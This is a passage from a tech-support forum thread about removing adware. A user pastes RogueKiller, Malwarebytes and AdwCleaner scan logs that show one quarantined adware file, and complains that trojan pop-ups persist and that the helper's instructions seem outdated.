    • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
    • To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
    • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
    • A copy of all logfiles are saved to C:\AdwCleaner.

    -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.

  14. #14
    Join Date
    Jul 2008
    Posts
    232
    RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
    mail : https://adlice.com/contact/
    Website : https://adlice.com/download/roguekiller/
    Operating System : Windows 10 (10.0.10240) 64 bits
    Started in : Normal mode
    User : Thomazing! [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Signatures : 20190204_072850, Driver : Loaded
    Mode : Standard Scan, Scan -- Date : 2019/02/11 07:11:47 (Duration : 00:17:22)

    中中中中中中中中中中中中 Processes 中中中中中中中中中中中中

    中中中中中中中中中中中中 Process Modules 中中中中中中中中中中中中

    中中中中中中中中中中中中 Services 中中中中中中中中中中中中

    中中中中中中中中中中中中 Tasks 中中中中中中中中中中中中

    中中中中中中中中中中中中 Registry 中中中中中中中中中中中中

    中中中中中中中中中中中中 WMI 中中中中中中中中中中中中

    中中中中中中中中中中中中 Hosts File 中中中中中中中中中中中中

    中中中中中中中中中中中中 Files 中中中中中中中中中中中中

    中中中中中中中中中中中中 Web browsers 中中中中中中中中中中中中













    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 2/11/19
    Scan Time: 7:30 AM
    Log File: ccc3d460-2d8b-11e9-b3ab-0026b664e783.json

    -Software Information-
    Version: 3.7.1.2839
    Components Version: 1.0.538
    Update Package Version: 1.0.9200
    License: Trial

    -System Information-
    OS: Windows 10 (Build 10240.16487)
    CPU: x64
    File System: NTFS
    User: DESKTOP-OHFLJFD\Thomazing!

    -Scan Summary-
    Scan Type: Threat Scan
    Scan Initiated By: Manual
    Result: Completed
    Objects Scanned: 244845
    Threats Detected: 1
    Threats Quarantined: 1
    Time Elapsed: 3 min, 16 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Detect
    PUM: Detect

    -Scan Details-
    Process: 0
    (No malicious items detected)

    Module: 0
    (No malicious items detected)

    Registry Key: 0
    (No malicious items detected)

    Registry Value: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Data Stream: 0
    (No malicious items detected)

    Folder: 0
    (No malicious items detected)

    File: 1
    Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\GLOBAL_INSTALLER.EXE, Quarantined, [2891], [637435],1.0.9200

    Physical Sector: 0
    (No malicious items detected)

    WMI: 0
    (No malicious items detected)


    (end)

  15. #15
    Join Date
    Jul 2008
    Posts
    232
    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-01-25.2 (Local)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Clean
    # -------------------------------
    # Start: 02-11-2019
    # Duration: 00:00:00
    # OS: Windows 10 Pro
    # Cleaned: 0
    # Failed: 0


    ***** [ Services ] *****

    No malicious services cleaned.

    ***** [ Folders ] *****

    No malicious folders cleaned.

    ***** [ Files ] *****

    No malicious files cleaned.

    ***** [ DLL ] *****

    No malicious DLLs cleaned.

    ***** [ WMI ] *****

    No malicious WMI cleaned.

    ***** [ Shortcuts ] *****

    No malicious shortcuts cleaned.

    ***** [ Tasks ] *****

    No malicious tasks cleaned.

    ***** [ Registry ] *****

    No malicious registry entries cleaned.

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries cleaned.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs cleaned.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries cleaned.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs cleaned.


    *************************

    [+] Delete Tracing Keys
    [+] Reset Winsock

    *************************

    AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
    AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]
    AdwCleaner[S01].txt - [1371 octets] - [11/02/2019 07:45:20]

    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########



    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-01-25.2 (Local)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Scan
    # -------------------------------
    # Start: 02-11-2019
    # Duration: 00:00:16
    # OS: Windows 10 Pro
    # Scanned: 31769
    # Detected: 0


    ***** [ Services ] *****

    No malicious services found.

    ***** [ Folders ] *****

    No malicious folders found.

    ***** [ Files ] *****

    No malicious files found.

    ***** [ DLL ] *****

    No malicious DLLs found.

    ***** [ WMI ] *****

    No malicious WMI found.

    ***** [ Shortcuts ] *****

    No malicious shortcuts found.

    ***** [ Tasks ] *****

    No malicious tasks found.

    ***** [ Registry ] *****

    No malicious registry entries found.

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries found.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs found.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries found.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs found.


    AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
    AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]

    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########


    Fruad and trojans still pops up and blocked by mwb.

    Btw, seems your instructions are old like 10 years ago. Maybe you should update it. It's different now.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •